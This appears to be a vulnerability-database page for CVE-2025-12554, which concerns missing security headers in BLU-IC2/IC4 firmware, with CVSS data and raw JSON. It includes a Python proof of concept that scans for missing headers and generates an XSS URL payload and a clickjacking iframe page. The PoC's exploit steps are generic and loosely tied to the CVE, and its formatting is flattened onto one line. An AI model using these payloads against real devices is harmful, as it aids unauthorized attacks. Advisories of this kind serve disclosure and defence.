Security Vulnerability Report
中文
CVE-2025-12554 CVSS 9.8 CRITICAL

CVE-2025-12554

Published: 2025-10-31 16:15:40
Last Modified: 2025-11-10 14:48:02
Source: a0340c66-c385-4f8b-991b-3d05f6fd5220

Description

Missing Security Headers.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:azure-access:blu-ic2_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:azure-access:blu-ic2:*:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:azure-access:blu-ic4_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:azure-access:blu-ic4:*:*:*:*:*:*:*:* - NOT VULNERABLE
BLU-IC2 <= 1.19.5
BLU-IC4 <= 1.19.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12554 PoC - Missing Security Headers in BLU-IC2/BLU-IC4 # This PoC demonstrates the vulnerability by checking for missing security headers import requests import json def check_missing_security_headers(target_url): """ Check if the target is vulnerable to CVE-2025-12554 Missing security headers: CSP, X-Frame-Options, X-Content-Type-Options, etc. """ required_headers = [ 'Content-Security-Policy', 'X-Frame-Options', 'X-Content-Type-Options', 'Strict-Transport-Security', 'X-XSS-Protection' ] vulnerable_headers = [] try: response = requests.get(target_url, timeout=10) headers = response.headers print(f"[*] Checking {target_url} for missing security headers...") print(f"[*] Status Code: {response.status_code}") print("\n[+] Response Headers:") for header in headers: print(f" {header}: {headers[header]}") print("\n[*] Checking required security headers:") for sec_header in required_headers: if sec_header not in headers: print(f" [-] MISSING: {sec_header}") vulnerable_headers.append(sec_header) else: print(f" [+] PRESENT: {sec_header}") if vulnerable_headers: print(f"\n[!] VULNERABLE: {len(vulnerable_headers)} security headers missing") print(f"[!] Affected headers: {', '.join(vulnerable_headers)}") return True, vulnerable_headers else: print("\n[+] NOT VULNERABLE: All required security headers present") return False, [] except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") return None, [] def exploit_xss_via_missing_csp(target_url): """ Exploit XSS via missing Content-Security-Policy header """ payload = "<script>alert('XSS - CVE-2025-12554')</script>" print(f"\n[*] XSS Payload: {payload}") print("[*] Without CSP, this script can be executed in user's browser") return f"{target_url}?input={payload}" def exploit_clickjacking_via_missing_xfo(target_url): """ Exploit clickjacking via missing X-Frame-Options header """ iframe_payload = f""" <html> <body> <h1>Clickjacking PoC - CVE-2025-12554</h1> <iframe src="{target_url}" width="100%" height="600px"></iframe> </body> </html> """ print("\n[*] X-Frame-Options header is missing") print("[*] Attacker can embed the page in an iframe for clickjacking attacks") return iframe_payload if __name__ == "__main__": target = input("Enter target URL (e.g., http://target-device:port): ").strip() if not target: target = "http://example-blu-ic2-device.local" is_vulnerable, missing = check_missing_security_headers(target) if is_vulnerable: print("\n" + "="*60) print("[!] Target is VULNERABLE to CVE-2025-12554") print("[!] CVSS Score: 9.8 (CRITICAL)") print("="*60) # Generate exploit examples exploit_xss_via_missing_csp(target) exploit_clickjacking_via_missing_xfo(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12554", "sourceIdentifier": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "published": "2025-10-31T16:15:40.170", "lastModified": "2025-11-10T14:48:02.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Security Headers.This issue affects BLU-IC2: through 1.19.5; BLU-IC4: through 1.19.5."}], "metrics": {"cvssMetricV40": [{"source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:azure-access:blu-ic2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20", "matchCriteriaId": "00BF15A1-C965-4601-83E9-8617B86E833A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:azure-access:blu-ic2:*:*:*:*:*:*:*:*", "matchCriteriaId": "C898C110-6C42-40A0-93FC-B6ED785F23A9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:azure-access:blu-ic4_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20", "matchCriteriaId": "6493C6E4-1304-4B28-A6C5-37CE2D1EAE46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:azure-access:blu-ic4:*:*:*:*:*:*:*:*", "matchCriteriaId": "902CD787-42BF-4565-8CA5-78123E37AA99"}]}]}], "references": [{"url": "https://azure-access.com/security-advisories", "source": "a0340c66-c385-4f8b-991b-3d05f6fd5220", "tags": ["Vendor Advisory"]}]}}